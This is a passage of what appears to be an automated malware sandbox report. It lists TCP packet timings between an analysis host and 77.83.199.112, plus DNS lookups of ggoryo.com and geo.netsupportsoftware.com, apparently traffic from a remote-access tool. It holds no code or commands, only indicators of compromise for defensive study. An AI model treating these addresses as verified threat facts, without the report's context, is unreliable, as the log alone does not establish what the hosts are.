                                                                                                                                                  Oct 8, 2024 15:23:45.988181114 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.988648891 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.988691092 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.988730907 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.988739014 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.988794088 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.988794088 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.989095926 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.989136934 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.989212990 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.989212990 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.989222050 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.989283085 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.000602961 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.000644922 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.000711918 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.000758886 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.000777006 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.000807047 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.076922894 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.076951027 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.077091932 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.077136993 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.077186108 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.077266932 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.077282906 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.077327967 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.077337027 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.077382088 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.077382088 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.077730894 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.077748060 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.077800035 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.077812910 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.077830076 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.077846050 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.078231096 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.078247070 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.078305960 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.078319073 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.078358889 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.079540968 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.079560995 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.079627991 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.079643965 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.079680920 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.080419064 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.080435038 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.080493927 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.080507040 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.080552101 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.080857038 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.080872059 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.080935001 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.080945015 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.080991030 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.090986013 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.091021061 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.091104031 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.091130972 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.091144085 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.091180086 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.168690920 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.168761969 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.168862104 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.168910027 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.168920994 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.169003963 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.169029951 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.169061899 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.169105053 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.169130087 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.169143915 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.169148922 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.169183969 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.169205904 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.169509888 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.169553041 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.169588089 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.169594049 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.169622898 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.169647932 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.169660091 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.169735909 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.169744015 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.169749975 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.169807911 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.170866013 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.170908928 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.170944929 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.170954943 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.170970917 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.170993090 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.171634912 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.171679974 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.171713114 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.171721935 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.171746969 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.171767950 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.171850920 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.171900034 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.171925068 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.171931982 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.171968937 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.171997070 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.182518005 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.182562113 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.182636023 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.182646036 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.182683945 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.259094954 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259121895 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259310007 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.259345055 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259433985 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.259495974 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259512901 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259576082 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.259582996 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259906054 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259948969 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259989977 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.259999037 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.260031939 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.260094881 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.260163069 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.260191917 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.260221958 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.260227919 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.260260105 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.260294914 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.260946989 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.260965109 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.261051893 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.261060953 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.261142015 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.261845112 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.261862040 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.261926889 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.261934042 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.261990070 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.262360096 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.262376070 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.262456894 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.262468100 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.262512922 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.273252010 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.273286104 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.273369074 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.273395061 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.273447990 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.349980116 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350034952 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350155115 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.350167990 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350209951 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.350295067 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350336075 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350367069 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.350373030 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350400925 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.350430012 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.350903988 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350944042 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350986004 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.350995064 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.351021051 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.351047039 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.351135969 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.351176977 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.351207018 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.351214886 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.351238012 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.351260900 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.351965904 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.352006912 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.352041006 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.352049112 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.352094889 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.352982998 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.353033066 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.353058100 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.353065968 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.353097916 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.353125095 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.353522062 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.353560925 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.353588104 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.353595018 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.353626966 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.353634119 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.363997936 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.364043951 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.364159107 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.364160061 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.364176989 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.364260912 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442229033 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442285061 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442336082 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442349911 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442385912 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442405939 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442461014 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442507982 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442526102 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442533016 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442564964 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442584991 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442919016 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442959070 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442991018 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442997932 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.443022966 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.443042994 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.443341970 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.443407059 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.443422079 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.443428993 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.443470001 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.443556070 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.443597078 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.443630934 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.443636894 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.443660021 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.443684101 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.443975925 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.444016933 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.444052935 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.444058895 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.444112062 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.444363117 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.444420099 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.444461107 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.444467068 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.444506884 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.454643965 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.454691887 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.454746008 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.454754114 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.454802990 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.454837084 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.533015013 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.533041954 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.533175945 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.533193111 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.533257961 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.533529043 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.533555031 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.533613920 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.533622026 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.533683062 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.533850908 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.533869028 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.533916950 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.533924103 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.533963919 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.533967018 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.533977985 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.534023046 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.534029007 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.534121990 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.534200907 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.537159920 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:47.950566053 CEST49708443192.168.2.165.181.159.137
                                                                                                                                                  Oct 8, 2024 15:23:47.950608969 CEST443497085.181.159.137192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:47.950719118 CEST49708443192.168.2.165.181.159.137
                                                                                                                                                  Oct 8, 2024 15:23:48.018405914 CEST49708443192.168.2.165.181.159.137
                                                                                                                                                  Oct 8, 2024 15:23:48.018434048 CEST443497085.181.159.137192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:48.018500090 CEST443497085.181.159.137192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:48.774760962 CEST4970980192.168.2.16104.26.1.231
                                                                                                                                                  Oct 8, 2024 15:23:48.779644012 CEST8049709104.26.1.231192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:48.779745102 CEST4970980192.168.2.16104.26.1.231
                                                                                                                                                  Oct 8, 2024 15:23:49.021406889 CEST4970980192.168.2.16104.26.1.231
                                                                                                                                                  Oct 8, 2024 15:23:49.026211023 CEST8049709104.26.1.231192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:49.474644899 CEST8049709104.26.1.231192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:49.474853039 CEST4970980192.168.2.16104.26.1.231

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Oct 8, 2024 15:23:28.223781109 CEST5608353192.168.2.161.1.1.1
                                                                                                                                                  Oct 8, 2024 15:23:28.371336937 CEST53560831.1.1.1192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:48.422188044 CEST5165953192.168.2.161.1.1.1
                                                                                                                                                  Oct 8, 2024 15:23:48.431422949 CEST53516591.1.1.1192.168.2.16

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Oct 8, 2024 15:23:28.223781109 CEST192.168.2.161.1.1.10x364Standard query (0)ggoryo.comA (IP address)IN (0x0001)false
                                                                                                                                                  Oct 8, 2024 15:23:48.422188044 CEST192.168.2.161.1.1.10x4d2dStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Oct 8, 2024 15:23:28.371336937 CEST1.1.1.1192.168.2.160x364No error (0)ggoryo.com77.83.199.112A (IP address)IN (0x0001)false
                                                                                                                                                  Oct 8, 2024 15:23:48.431422949 CEST1.1.1.1192.168.2.160x4d2dNo error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                                                                  Oct 8, 2024 15:23:48.431422949 CEST1.1.1.1192.168.2.160x4d2dNo error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
